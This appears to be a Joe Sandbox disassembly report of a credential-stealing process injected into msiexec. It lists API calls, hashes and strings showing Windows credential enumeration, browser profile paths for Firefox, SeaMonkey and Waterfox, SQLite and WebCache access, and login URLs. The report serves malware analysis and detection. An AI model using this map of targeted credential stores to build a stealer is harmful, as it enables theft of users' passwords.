                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697348961-0
                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                      • API String ID: 1829478387-11920434
                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                      • API String ID: 1829478387-2068335096
                                                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                      • API String ID: 1829478387-3369679110
                                                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 981974120-1717621600
                                                                                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                      • String ID: $0.@
                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941347001-0
                                                                                                      • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                      • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscat$wcscpywcslen
                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                      • API String ID: 2489821370-1174173950
                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 669240632-0
                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                      • String ID: "%s"
                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2911713577-0
                                                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Strings
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                      Memory Dump Source
